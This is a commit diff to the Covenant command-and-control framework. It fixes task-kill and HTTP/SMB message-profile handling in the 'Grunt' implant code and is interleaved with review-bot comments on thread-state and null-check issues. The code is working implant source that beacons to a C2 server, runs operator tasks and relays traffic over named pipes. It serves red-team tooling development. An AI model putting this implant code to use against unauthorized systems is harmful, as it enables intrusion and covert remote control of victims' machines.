Fix profile bug when HttpGetResponse differs from HttpPostResponse, Fix TaskKill display bug
cobbr committed Aug 21, 2020
1 parent ad30520 commit 3a9d765
Showing 5 changed files with 181 additions and 72 deletions.
2 changes: 2 additions & 0 deletions CHANGELOG.md
Expand Up @@ -11,6 +11,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0

### Fixed
- Fix edit roles for CovenantUser UI bug
- Fix profile bug when HttpGetResponse differs from HttpPostResponse
- Fix TaskKill display bug

## [v0.6] - 2020-08-04
### Added
63 changes: 45 additions & 18 deletions Covenant/Data/Grunt/Brute/Brute.cs
Expand Up @@ -138,26 +138,31 @@ public static void Execute(string CovenantURI, string CovenantCertHash, string G
}
else if(message.Type == GruntTaskingType.Tasks)
{
if (!Tasks.Where(J => J.Value.IsAlive).Any()) { output += "No active tasks!"; }
if (!Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Any()) { output += "No active tasks!"; }
else
{
output += "Task Status" + Environment.NewLine;
output += "---- ------" + Environment.NewLine;
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.IsAlive).Select(T => T.Key + " Active").ToArray());
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Select(T => T.Key + " Active").ToArray());
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
}
else if(message.Type == GruntTaskingType.TaskKill)
{
var matched = Tasks.Where(T => T.Value.IsAlive && T.Key.ToLower() == message.Message.ToLower());
var matched = Tasks.Where(T => T.Value.ThreadState == ThreadState.Running && T.Key.ToLower() == message.Message.ToLower());
if (!matched.Any())
{
output += "No task with name: " + message.Message;
output += "No active task with name: " + message.Message;
}
else
{
KeyValuePair<string, Thread> t = matched.First();
t.Value.Abort();
Thread.Sleep(3000);
if (t.Value.IsAlive)
{
t.Value.Suspend();
}
output += "Task: " + t.Key + " killed!";
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
Expand Down Expand Up @@ -308,12 +313,24 @@ private static void TaskExecute(TaskingMessenger messenger, GruntTaskingMessage
}
}

public enum MessageType
{
Read,
Write
}

public class ProfileMessage
{
public MessageType Type { get; set; }
public string Message { get; set; }
}

public interface IMessenger
{
string Hostname { get; }
string Identifier { get; set; }
string Authenticator { get; set; }
string Read();
ProfileMessage Read();
void Write(string Message);
void Close();
}
Expand Down Expand Up @@ -379,16 +396,24 @@ public TaskingMessenger(MessageCrafter Crafter, IMessenger Messenger, Profile Pr

public GruntTaskingMessage ReadTaskingMessage()
{
string read = "";
ProfileMessage readMessage = null;
lock (_UpstreamLock)
{
read = this.UpstreamMessenger.Read();
readMessage = this.UpstreamMessenger.Read();
}
if (read == null)
if (readMessage == null)
{
return null;
}
GruntEncryptedMessage gruntMessage = this.Profile.ParsePostResponse(read);
GruntEncryptedMessage gruntMessage = null;
if (readMessage.Type == MessageType.Read)
{
gruntMessage = this.Profile.ParseGetResponse(readMessage.Message);
}
else if (readMessage.Type == MessageType.Write)
{
gruntMessage = this.Profile.ParsePostResponse(readMessage.Message);
}
if (gruntMessage == null)
{
return null;
Expand All @@ -406,7 +431,7 @@ public GruntTaskingMessage ReadTaskingMessage()
if (relay != null)
{
// TODO: why does this need to be PostResponse?
relay.Write(this.Profile.FormatPostResponse(wrappedMessage));
relay.Write(this.Profile.FormatGetResponse(wrappedMessage));
}
return null;
}
Expand Down Expand Up @@ -481,7 +506,7 @@ public class HttpMessenger : IMessenger
private bool UseCertPinning { get; set; }
private bool ValidateCert { get; set; }

private string ToReadValue { get; set; } = "";
private Queue<ProfileMessage> ToReadQueue { get; } = new Queue<ProfileMessage>();

public HttpMessenger(string CovenantURI, string CovenantCertHash, bool UseCertPinning, bool ValidateCert, List<string> ProfileHttpHeaderNames, List<string> ProfileHttpHeaderValues, List<string> ProfileHttpUrls)
{
Expand Down Expand Up @@ -514,18 +539,16 @@ public HttpMessenger(string CovenantURI, string CovenantCertHash, bool UseCertPi
};
}

public string Read()
public ProfileMessage Read()
{
if (ToReadValue != "")
if (this.ToReadQueue.Any())
{
string temp = ToReadValue;
ToReadValue = "";
return temp;
return this.ToReadQueue.Dequeue();
}
lock (this._WebClientLock)
{
this.SetupCookieWebClient();
return this.CovenantClient.DownloadString(this.CovenantURI + this.GetURL());
return new ProfileMessage { Type = MessageType.Read, Message = this.CovenantClient.DownloadString(this.CovenantURI + this.GetURL()) };
}
}

Expand All @@ -534,7 +557,11 @@ public void Write(string Message)
lock (this._WebClientLock)
{
this.SetupCookieWebClient();
this.ToReadValue = this.CovenantClient.UploadString(this.CovenantURI + this.GetURL(), Message);
ProfileMessage ToReadMessage = new ProfileMessage { Type = MessageType.Write, Message = this.CovenantClient.UploadString(this.CovenantURI + this.GetURL(), Message) };
if (ToReadMessage.Message != "")
{
this.ToReadQueue.Enqueue(ToReadMessage);
}
}
}

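Review bot: The new liveness filter `T.Value.ThreadState == ThreadState.Running` in the Tasks listing and the TaskKill match (first hunk) reports a task as inactive whenever its worker thread is merely blocked, because ThreadState is a flags value with Running equal to zero: a thread sleeping, waiting on I/O or joining carries WaitSleepJoin, and a thread started as a background thread carries Background, so neither compares equal to Running and such tasks show as "No active tasks!" and cannot be matched by TaskKill. If the intent is only to hide threads parked by the Suspend() call added in the same hunk, `T.Value.IsAlive && (T.Value.ThreadState & ThreadState.Suspended) == 0` keeps blocked threads visible while still excluding suspended ones. The identical filter is introduced in the Tasks/TaskKill hunk of GruntBridge.cs and should change the same way. Separately, Thread.Suspend is marked obsolete and a thread suspended after an Abort that did not complete keeps whatever locks it holds, so a short comment on the Suspend() line explaining why parking the thread is preferred to leaving it alive would help the next reader; Execute starts and ends outside the hunk.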
61 changes: 48 additions & 13 deletions Covenant/Data/Grunt/GruntBridge/GruntBridge.cs
Expand Up @@ -142,26 +142,31 @@ public static void Execute(string CovenantURI, string GUID, Aes SessionKey, TcpC
}
else if(message.Type == GruntTaskingType.Tasks)
{
if (!Tasks.Where(J => J.Value.IsAlive).Any()) { output += "No active tasks!"; }
if (!Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Any()) { output += "No active tasks!"; }
else
{
output += "Task Status" + Environment.NewLine;
output += "---- ------" + Environment.NewLine;
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.IsAlive).Select(T => T.Key + " Active").ToArray());
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Select(T => T.Key + " Active").ToArray());
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
}
else if(message.Type == GruntTaskingType.TaskKill)
{
var matched = Tasks.Where(T => T.Value.IsAlive && T.Key.ToLower() == message.Message.ToLower());
var matched = Tasks.Where(T => T.Value.ThreadState == ThreadState.Running && T.Key.ToLower() == message.Message.ToLower());
if (!matched.Any())
{
output += "No task with name: " + message.Message;
output += "No active task with name: " + message.Message;
}
else
{
KeyValuePair<string, Thread> t = matched.First();
t.Value.Abort();
Thread.Sleep(3000);
if (t.Value.IsAlive)
{
t.Value.Suspend();
}
output += "Task: " + t.Key + " killed!";
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
Expand Down Expand Up @@ -334,6 +339,28 @@ private static IntPtr TaskExecute(TaskingMessenger messenger, GruntTaskingMessag
}
}

public enum MessageType
{
Read,
Write
}

public class ProfileMessage
{
public MessageType Type { get; set; }
public string Message { get; set; }
}

public interface IMessenger
{
string Hostname { get; }
string Identifier { get; set; }
string Authenticator { get; set; }
ProfileMessage Read();
void Write(string Message);
void Close();
}

public class Profile
{
private string ReadFormat { get; }
Expand Down Expand Up @@ -393,16 +420,24 @@ public TaskingMessenger(MessageCrafter Crafter, IMessenger Messenger, Profile Pr

public GruntTaskingMessage ReadTaskingMessage()
{
string read = "";
ProfileMessage readMessage = null;
lock (_UpstreamLock)
{
read = this.UpstreamMessenger.Read();
readMessage = this.UpstreamMessenger.Read();
}
if (read == null)
if (readMessage == null)
{
return null;
}
GruntEncryptedMessage gruntMessage = this.Profile.ParseReadFormat(read);
GruntEncryptedMessage gruntMessage = null;
if (readMessage.Type == MessageType.Read)
{
gruntMessage = this.Profile.ParseReadFormat(readMessage.Message);
}
else if (readMessage.Type == MessageType.Write)
{
gruntMessage = this.Profile.ParseWriteFormat(readMessage.Message);
}
if (gruntMessage == null)
{
return null;
Expand Down Expand Up @@ -474,10 +509,10 @@ public bool Connect(string Hostname, string PipeName)
{
try
{
string read = downstream.Read();
ProfileMessage read = downstream.Read();
if (downstream.Identifier == "")
{
GruntEncryptedMessage message = this.Profile.ParseWriteFormat(read);
GruntEncryptedMessage message = this.Profile.ParseWriteFormat(read.Message);
if (message.GUID.Length == 20)
{
downstream.Identifier = message.GUID.Substring(10);
Expand All @@ -487,7 +522,7 @@ public bool Connect(string Hostname, string PipeName)
downstream.Identifier = message.GUID;
}
}
this.UpstreamMessenger.Write(read);
this.UpstreamMessenger.Write(read.Message);
}
catch (ThreadAbortException)
{
Expand Down Expand Up @@ -570,9 +605,9 @@ public SMBMessenger(string Hostname, string PipeName = "gruntsvc", int Timeout =
this.Pipe = ClientPipe;
}

public string Read()
public ProfileMessage Read()
{
return Common.GruntEncoding.GetString(this.ReadBytes());
return new ProfileMessage { Type = MessageType.Read, Message = Common.GruntEncoding.GetString(this.ReadBytes()) };
}

public void Write(string Message)
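Review bot: In the Connect hunk, `ProfileMessage read = downstream.Read();` now carries a Type, yet the following lines parse `read.Message` with ParseWriteFormat unconditionally and never consult `read.Type`, while SMBMessenger.Read() in the last hunk tags every message as MessageType.Read. The tag is therefore only meaningful for the upstream direction handled in ReadTaskingMessage, and a reader of Connect will wonder why a message labelled Read is parsed with the Write format; a comment on the parse line such as `// downstream children always send in write format; read.Type is not consulted here` would make the asymmetry explicit. Also, `read.Message` is dereferenced without a null check: the SMBMessenger.Read() shown here always returns a new object, but ReadTaskingMessage guards against a null from IMessenger.Read(), so if any other implementation can return null this line throws inside the try block. Connect starts and ends outside the hunk.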